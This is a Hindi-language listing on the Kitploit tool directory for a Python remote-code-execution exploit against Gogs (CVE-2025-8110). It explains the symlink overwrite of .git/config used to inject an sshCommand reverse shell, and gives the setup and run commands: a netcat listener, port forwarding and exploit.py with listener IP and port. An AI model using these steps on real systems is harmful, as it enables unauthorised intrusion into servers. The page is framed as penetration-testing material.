Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-8110-Gogs-RCE-Exploit — Gogs CVE-2025-8110 RCE Exploit | Kitploit
उपकरण/GitHubGitHub/adityainnovates/cve-2025-8110-gogs-rce-exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubadityainnovates/cve-2025-8110-gogs-rce-exploit

CVE-2025-8110-Gogs-RCE-Exploit

Gogs CVE-2025-8110 RCE Exploit

रिपॉजिटरी देखें
135 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Gogs CVE-2025-8110 RCE शोषण

Gogs में CVE-2025-8110 के लिए एक स्वचालित Python शोषण। यह कमजोरी PutContents API का दुरुपयोग करके दूरस्थ कोड निष्पादन (RCE) की अनुमति देती है, जो यह सत्यापित करने में विफल रहता है कि कोई फ़ाइल पथ सिमलिंक है या नहीं। सिमलिंक के माध्यम से आंतरिक .git/config फ़ाइल को अधिलेखित करके, हम रिवर्स शेल को ट्रिगर करने के लिए एक दुर्भावनापूर्ण sshCommand इंजेक्ट कर सकते हैं।

🛠️ आवश्यक शर्तें

सुनिश्चित करें कि आपके पास Python 3 और आवश्यक निर्भरताएँ स्थापित हैं:

root@kitploit:~
pip install requests rich beautifulsoup4

आपके पास git स्थापित होना चाहिए और रिपॉजिटरी क्लोनिंग और कमिटिंग चरण के लिए आपके $PATH में उपलब्ध होना चाहिए।

⚙️ सेटअप और कॉन्फ़िगरेशन

1. Gogs WebUI तक पहुँचना

Gogs 127.0.0.1:3001 पर बंधा हो सकता है। WebUI तक स्थानीय रूप से पहुँचने के लिए पोर्ट फ़ॉरवर्डिंग का उपयोग करें:

root@kitploit:~
ssh -L 3001:127.0.0.1:3001 user@target-ip

2. खाता निर्माण

एक बार फ़ॉरवर्ड करने के बाद, http://localhost:3001 पर जाएँ:

  • एक नया खाता बनाएँ।
  • स्क्रिप्ट के लिए अपना उपयोगकर्ता नाम और पासवर्ड नोट कर लें।

3. API टोकन जनरेट करना

स्क्रिप्ट पेलोड वितरित करने के लिए Gogs API का उपयोग करती है:

  1. WebUI में लॉग इन करें।
  2. सेटिंग्स -> एप्लिकेशन पर जाएँ।
  3. व्यक्तिगत एक्सेस टोकन प्रबंधित करें के अंतर्गत, एक नया टोकन जनरेट करें।
  4. टोकन को तुरंत कॉपी करें।

🚀 निष्पादन

1. Netcat लिसनर प्रारंभ करें

स्क्रिप्ट चलाने से पहले अपना लिसनर प्रारंभ करें, क्योंकि API अपडेट संसाधित होते ही शेल ट्रिगर हो जाता है।

root@kitploit:~
nc -lvnp 5555

2. शोषण चलाएँ

अपनी साख और टोकन को तर्क के रूप में पास करें:

root@kitploit:~
python3 exploit.py -u http://localhost:3001 -un <YOUR_USER> -pw <YOUR_PASS> -t <YOUR_TOKEN> -lh <YOUR_IP> -lp 5555

तर्क

Flagविवरण
-uGogs इंस्टेंस का बेस URL (जैसे, http://localhost:3001)।
-unआपके द्वारा बनाए गए खाते का उपयोगकर्ता नाम।
-pwआपके द्वारा बनाए गए खाते का पासवर्ड।
-tसेटिंग्स में जनरेट किया गया API टोकन।
-lhआपके लिसनर का IP पता (LHOST)।
-lpआपके लिसनर का पोर्ट (LPORT)।

नोट: यदि स्क्रिप्ट हैंग हो जाती है या "Overwriting .git/config" के बाद Read timed out लौटाती है, तो अपना लिसनर जाँचें। यह आमतौर पर इंगित करता है कि रिवर्स शेल सफलतापूर्वक कनेक्ट हो गया है और कनेक्शन को होल्ड कर रहा है।


लेखक: TYehan

अस्वीकरण: यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा ऑडिटिंग के लिए है। जिम्मेदारी से उपयोग करें।

टूल डाउनलोड करें